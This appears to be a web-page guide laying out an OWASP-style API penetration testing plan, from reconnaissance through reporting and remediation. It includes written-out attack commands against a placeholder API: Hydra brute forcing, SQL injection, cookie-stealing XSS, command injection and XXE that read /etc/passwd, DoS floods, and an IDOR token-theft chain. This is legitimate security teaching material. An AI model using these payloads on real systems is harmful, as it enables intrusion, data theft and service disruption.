🔒 OWASP API Security Testing

Comprehensive Penetration Testing Plan for API Security Assessment

1. Introduction

Objective: The purpose of this penetration test is to identify potential security vulnerabilities in the target API, assess the effectiveness of its authentication and authorization mechanisms, and check for common flaws such as SQL Injection, Cross-Site Scripting (XSS), Broken Access Control (BAC), Insecure Direct Object References (IDOR), and Data Exposure.

Scope & Parameters

  • Testing Scope: Only the publicly accessible endpoints of the API are to be tested
  • Internal Testing: Internal endpoints may be tested if appropriate authorization has been provided
  • Duration: Estimated testing period: 3-5 days
  • Test Environment: Live production environment (with permission) or a staging environment

API Penetration Testing Workflow

📋 Planning & Reconnaissance
🔍 Information Gathering
🎯 Vulnerability Assessment
💥 Exploitation
📊 Reporting & Remediation

2. Tools and Resources

The following tools are essential for conducting a comprehensive API penetration test:

Burp Suite

For intercepting and manipulating API traffic

Postman

For crafting and sending API requests

OWASP ZAP

For automated vulnerability scanning

Swagger/OpenAPI

For understanding the API structure

Python

For scripting custom attacks and automation

Nmap

For port scanning and network discovery

SQLmap

For automated SQL Injection testing

Amass

For subdomain enumeration

JWT.io

For inspecting and manipulating JSON Web Tokens

Example: Installing Required Tools

sudo apt-get update && sudo apt-get install burpsuite
pip install requests python-jwt
go install github.com/OWASP/Amass/v3/...@master
git clone https://github.com/sqlmapproject/sqlmap.git

3. Information Gathering and Reconnaissance

3.1 API Documentation Review

Obtain API documentation (Swagger/OpenAPI) to understand the structure of the endpoints and the authentication methods. Review available methods (GET, POST, PUT, DELETE) and expected inputs/outputs.

curl -X GET "https://api.example.com/v1/swagger.json" -H "accept: application/json"

3.2 Enumerate Subdomains and Services

Use tools like Amass or Sublist3r to discover any subdomains hosting API services.

amass enum -d example.com -o subdomains.txt
python3 sublist3r.py -d example.com -o subdomains.txt

3.3 Fingerprinting

Identify the API's backend technologies and frameworks (e.g., Node.js, Flask, Django, etc.).

nmap -sV -p 443 api.example.com
curl -I https://api.example.com/v1/users

3.4 Gather API Endpoints

Use tools like Burp Suite or Postman to map all available API endpoints, noting any potential for authentication or authorization issues.

python3 -m http.server 8080 --directory ./swagger-ui

3.5 Inspect Authentication

Evaluate how the API handles user authentication, including tokens, cookies, or API keys.

Example: Testing JWT Token

curl -X POST "https://api.example.com/v1/auth/login" -H "Content-Type: application/json" -d '{"username":"testuser","password":"password123"}'
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." | jwt decode -

Phase 1

Passive Reconnaissance

Phase 2

Active Scanning

Phase 3

Endpoint Mapping

Phase 4

Authentication Analysis

4. Testing for Vulnerabilities

4.1 Authentication Testing

Token Authentication: Test for weaknesses in Bearer Tokens or API Key handling.

  • Test expired tokens
  • Attempt to bypass token-based authentication by crafting invalid tokens

Example: Testing Expired Token

curl -X GET "https://api.example.com/v1/users/profile" -H "Authorization: Bearer EXPIRED_TOKEN_HERE"

OAuth2 & JWT Testing:

  • Inspect and manipulate JWT tokens using tools like JWT.io. Check for weak signing algorithms, exposed secrets, and token expiry issues
  • Test for insecure OAuth flows or improper token validation

Example: JWT Token Manipulation

python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -C -d attack_dictionary.txt
curl -X GET "https://api.example.com/v1/admin" -H "Authorization: Bearer MANIPULATED_TOKEN"

Brute Force Testing: Use tools like Hydra or Burp Intruder to test for weak passwords or the absence of rate limiting.

hydra -l admin -P passwords.txt api.example.com https-post-form "/api/v1/login:username=^USER^&password=^PASS^:F=Invalid credentials"

4.2 Authorization and Access Control Testing

Role-based Access Control (RBAC):

  • Test for Broken Access Control (BAC) by manipulating roles (e.g., changing user roles in API requests)
  • Attempt to access endpoints that should only be accessible by specific roles (admin, user)

Example: Testing RBAC Bypass

curl -X GET "https://api.example.com/v1/admin/users" -H "Authorization: Bearer USER_TOKEN"
curl -X POST "https://api.example.com/v1/users/update" -H "Content-Type: application/json" -d '{"user_id":123,"role":"admin"}'

Insecure Direct Object Reference (IDOR):

  • Manipulate URL parameters to test if unauthorized access to user data is possible (e.g., /api/user/123 -> /api/user/124)
  • Attempt to access data from other users (by modifying API request parameters)

Example: Testing IDOR Vulnerability

curl -X GET "https://api.example.com/v1/users/123/profile" -H "Authorization: Bearer USER_TOKEN"
curl -X GET "https://api.example.com/v1/users/124/profile" -H "Authorization: Bearer USER_TOKEN"
for i in {1..1000}; do curl -X GET "https://api.example.com/v1/orders/$i" -H "Authorization: Bearer TOKEN"; done

4.3 Data Validation and Input Sanitization

Vulnerability Type Testing Method Risk Level
SQL Injection SQLmap or manual payload injection Critical
XSS (Cross-Site Scripting) Submit malicious input in API requests High
Command Injection Execute system commands via API parameters Critical
XXE Injection Test XML data processing High
File Upload Vulnerabilities Upload malicious files High

Example: SQL Injection Testing

sqlmap -u "https://api.example.com/v1/users?id=1" --cookie="session_id=abc123" --dbs
curl -X GET "https://api.example.com/v1/search?q=' OR '1'='1" -H "Authorization: Bearer TOKEN"
curl -X POST "https://api.example.com/v1/login" -d "username=admin' OR 1=1--&password=anything"

Example: XSS Testing

curl -X POST "https://api.example.com/v1/comments" -H "Content-Type: application/json" -d '{"comment":"<script>alert(document.cookie)</script>"}'
curl -X GET "https://api.example.com/v1/search?q=<img src=x onerror=alert('XSS')>"

Example: Command Injection Testing

curl -X POST "https://api.example.com/v1/ping" -d '{"host":"example.com; cat /etc/passwd"}'
curl -X GET "https://api.example.com/v1/export?filename=file.txt%3Bwhoami"

Example: XXE Injection Testing

curl -X POST "https://api.example.com/v1/upload" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

4.4 API Rate Limiting and DoS Testing

⚠️ Warning: DoS testing should only be performed in controlled environments with explicit permission to avoid service disruption.

Rate Limiting Bypass: Test if the API implements proper rate limiting or if attackers can flood the system with requests (e.g., brute-force attempts).

for i in {1..1000}; do curl -X POST "https://api.example.com/v1/login" -d "username=admin&password=test$i" & done

Denial of Service (DoS): Check if the API can be overloaded with a high volume of requests or malformed input.

ab -n 10000 -c 100 https://api.example.com/v1/users
python3 slowloris.py api.example.com -p 443 -s 500

4.5 Business Logic Testing

Misconfiguration or Flaws in Business Logic:

  • Test for flaws in the API logic where an attacker could manipulate the process to their advantage (e.g., changing order status, exploiting discounts)
  • Evaluate if unintended functionality is exposed by API endpoints, which could result in data corruption or misuse

Example: Business Logic Vulnerability Testing

curl -X POST "https://api.example.com/v1/orders" -H "Content-Type: application/json" -d '{"item_id":123,"quantity":-5,"price":100}'
curl -X PUT "https://api.example.com/v1/orders/456/status" -d '{"status":"completed"}' -H "Authorization: Bearer USER_TOKEN"
curl -X POST "https://api.example.com/v1/payments" -d '{"amount":0.01,"order_id":789}'

5. Exploitation

5.1 Payload Testing

Test real-world scenarios using custom payloads (injection, XSS, command execution) to exploit identified vulnerabilities.

Example: Custom Exploitation Script

python3 custom_exploit.py --target https://api.example.com --vulnerability sqli --payload "' OR 1=1--"
curl -X POST "https://api.example.com/v1/vulnerable" -d @exploit_payload.json

5.2 Chaining Vulnerabilities

Explore how multiple vulnerabilities might be chained together to escalate privileges, cause data leaks, or compromise the system.

Example: Chained Attack Scenario

Step 1: Exploit IDOR to access another user's data

curl -X GET "https://api.example.com/v1/users/999/token" -H "Authorization: Bearer USER_TOKEN"

Step 2: Use stolen token to access admin endpoint

curl -X GET "https://api.example.com/v1/admin/settings" -H "Authorization: Bearer STOLEN_ADMIN_TOKEN"

Step 3: Modify system configuration

curl -X PUT "https://api.example.com/v1/admin/config" -H "Authorization: Bearer STOLEN_ADMIN_TOKEN" -d '{"debug_mode":"true"}'

Attack Chain Visualization

🎯 Initial Access (IDOR)
🔓 Token Theft
👑 Privilege Escalation
💀 System Compromise

6. Reporting

6.1 Vulnerability Documentation

For each vulnerability found, document the following:

  • Description of the vulnerability
  • Proof of concept (PoC) demonstrating the issue
  • Risk assessment (severity level)
  • Steps to reproduce
  • Recommendations for remediation

Example: Vulnerability Report Template

Vulnerability: Insecure Direct Object Reference (IDOR)

Severity: High

Affected Endpoint: GET /api/v1/users/{user_id}/profile

Description: The API does not properly validate user authorization when accessing user profiles, allowing any authenticated user to access other users' sensitive information by manipulating the user_id parameter.

Proof of Concept:

curl -X GET "https://api.example.com/v1/users/123/profile" -H "Authorization: Bearer USER_TOKEN_FOR_USER_456"

Impact: Unauthorized access to sensitive user data including email addresses, phone numbers, and personal information.

Remediation: Implement proper authorization checks to ensure users can only access their own profile data. Validate that the authenticated user's ID matches the requested user_id parameter.

6.2 Test Results Summary

Provide an executive summary of the overall security posture, with details of critical findings and a roadmap for remediation.

Severity Count Example Vulnerabilities
Critical 3 SQL Injection, Remote Code Execution, Authentication Bypass
High 5 IDOR, Broken Access Control, XSS
Medium 8 Information Disclosure, Missing Rate Limiting
Low 12 Missing Security Headers, Verbose Error Messages

6.3 Verification

Once the vulnerabilities have been patched, perform a re-test to ensure that the issues are properly resolved.

python3 verify_fixes.py --report vulnerabilities_report.json --target https://api.example.com

7. Conclusion

Wrap-up

Summarize findings, provide a risk-level assessment of each vulnerability, and deliver actionable remediation steps.

Client Debrief

Offer a meeting to go over the findings and explain the potential impact of the vulnerabilities.

📌 Key Takeaways

  • This API Penetration Testing Plan provides a structured methodology for identifying and exploiting vulnerabilities in web APIs
  • The goal is to ensure the security of the application's API endpoints by testing various attack vectors, ranging from authentication flaws to business logic vulnerabilities
  • Ensure proper reporting, remediation, and follow-up testing for a complete and responsible security assessment
  • Always obtain explicit written permission before conducting any penetration testing activities
  • Document all findings thoroughly and provide clear remediation guidance
  • Follow responsible disclosure practices when reporting vulnerabilities

Continuous Security Improvement Cycle

Test
Report
Remediate
Verify